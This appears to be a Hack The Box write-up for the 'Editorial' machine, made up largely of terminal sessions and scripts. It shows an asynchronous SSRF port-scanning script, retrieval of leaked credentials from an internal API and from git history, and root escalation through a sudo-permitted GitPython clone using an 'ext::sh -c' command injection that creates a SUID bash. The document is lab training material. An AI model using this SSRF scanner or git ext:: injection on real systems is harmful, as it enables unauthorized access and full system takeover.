└─$ grep 'edit' /etc/hosts
10.10.11.20 editorial.htb
Last updated
└─$ serve 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.11.20 - - [16/Jun/2024 16:32:26] "GET /test HTTP/1.1" 200 -import aiohttp
import asyncio
URL = 'http://editorial.htb/upload-cover'
FAILURE = '/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg'
async def fetch(session, port):
url = f'http://0:{port}'
payload = aiohttp.FormData()
payload.add_field('bookurl', url)
payload.add_field('bookfile', b'', content_type='application/octet-stream')
async with session.post(URL, data=payload) as resp:
text = await resp.text()
if text == FAILURE:
print(f'[{port}] {url} Invalid')
else:
print(f'[{port}] {url} Valid')
async def main():
async with aiohttp.ClientSession() as session:
tasks = []
for i in range(3000, 2**16):
tasks.append(fetch(session, i))
if len(tasks) >= 100: # Send as batch
await asyncio.gather(*tasks)
tasks = []
if tasks: # Leftover
await asyncio.gather(*tasks)
if __name__ == '__main__':
asyncio.run(main())└─$ py ssrf.py -u | tee ssrf.log
└─$ head -1 ssrf.log
[3003] http://0:3003 Invalid
└─$ tail -1 ssrf.log
[14547] http://0:14547 Invalid
└─$ grep Valid ssrf.log
[5000] http://0:5000 Validimport json
import requests
class Routes:
BASE = 'http://editorial.htb'
COVER = BASE + '/upload-cover'
url = 'http://0:5000'
payload = {
"bookurl": (None, url),
"bookfile": ('', b'', 'application/octet-stream')
}
resp = requests.post(Routes.COVER, files=payload)
resp = requests.get(f'{Routes.BASE}/{resp.text}')
print(json.dumps(resp.json(), indent=2)){
"messages": [
{
"promotions": {
"description": "Retrieve a list of all the promotions in our library.",
"endpoint": "/api/latest/metadata/messages/promos",
"methods": "GET"
}
},
{
"coupons": {
"description": "Retrieve the list of coupons to use in our library.",
"endpoint": "/api/latest/metadata/messages/coupons",
"methods": "GET"
}
},
{
"new_authors": {
"description": "Retrieve the welcome message sended to our new authors.",
"endpoint": "/api/latest/metadata/messages/authors",
"methods": "GET"
}
},
{
"platform_use": {
"description": "Retrieve examples of how to use the platform.",
"endpoint": "/api/latest/metadata/messages/how_to_use_platform",
"methods": "GET"
}
}
],
"version": [
{
"changelog": {
"description": "Retrieve a list of all the versions and updates of the api.",
"endpoint": "/api/latest/metadata/changelog",
"methods": "GET"
}
},
{
"latest": {
"description": "Retrieve the last version of api.",
"endpoint": "/api/latest/metadata",
"methods": "GET"
}
}
]
} {
"1": {
"api_route": "/api/v1/metadata/",
"contact_email_1": "soporte@tiempoarriba.oc",
"contact_email_2": "info@tiempoarriba.oc",
"editorial": "Editorial El Tiempo Por Arriba"
}
},
{
"1.1": {
"api_route": "/api/v1.1/metadata/",
"contact_email_1": "soporte@tiempoarriba.oc",
"contact_email_2": "info@tiempoarriba.oc",
"editorial": "Ed Tiempo Arriba"
}
},
{
"1.2": {
"contact_email_1": "soporte@tiempoarriba.oc",
"contact_email_2": "info@tiempoarriba.oc",
"editorial": "Editorial Tiempo Arriba",
"endpoint": "/api/v1.2/metadata/"
}
},
{
"2": {
"contact_email": "info@tiempoarriba.moc.oc",
"editorial": "Editorial Tiempo Arriba",
"endpoint": "/api/v2/metadata/"
}
}
]{
"template_mail_message": "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."
}dev@editorial:~$ cat user.txt
6c29d0eb193182cb317f0fe4a0bce484dev@editorial:~/apps$ ls -alh
total 12K
drwxrwxr-x 3 dev dev 4.0K Jun 5 14:36 .
drwxr-x--- 4 dev dev 4.0K Jun 17 05:45 ..
drwxr-xr-x 8 dev dev 4.0K Jun 5 14:36 .git
dev@editorial:~/apps$ git checkout .
Updated 52 paths from the index
dev@editorial:~/apps/app_editorial$ vim app.py
...
# -------------------------------
# Program functions
# -------------------------------
# -- Reject internal requests
def request_reject_localhost(url_bookcover):
reject_url = ["localhost", "127.0.0.1"]
for i in reject_url:
if i in url_bookcover.lower():
return True
...dev@editorial:~/apps$ git log --oneline
8ad0f31 (HEAD -> master) fix: bugfix in api port endpoint
dfef9f2 change: remove debug and update api port
b73481b change(api): downgrading prod to dev
1e84a03 feat: create api to editorial info
3251ec9 feat: create editorial appdev@editorial:~/apps$ git show b73481b
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------dev@editorial:~/apps$ ls /home
dev prod
dev@editorial:~/apps$ su - prodprod@editorial:~$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *prod@editorial:/opt/internal_apps/clone_changes$ ls
branches clone_prod_change.py config description HEAD hooks info objects refs
prod@editorial:/opt/internal_apps/clone_changes$ cat clone_prod_change.py
##!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c touch% /tmp/pwned"
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c touch% /tmp/pwned new_changes
stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
'
prod@editorial:/opt/internal_apps/clone_changes$ ls /tmp/pwned -l
-rw-r--r-- 1 root root 33 Jun 17 06:56 /tmp/pwnedprod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cp% /bin/bash% /tmp/rootbash% &&% chmod% 4777% /tmp/rootbash"
prod@editorial:/opt/internal_apps/clone_changes$ ls /tmp
pwned rootbash
prod@editorial:/opt/internal_apps/clone_changes$ /tmp/rootbash -p
rootbash-5.1# rm /tmp/rootbash # For HTB Players
rootbash-5.1# cd /root
rootbash-5.1# cat root.txt
39d0f7ef01ec2921afaeee69dc7f96a6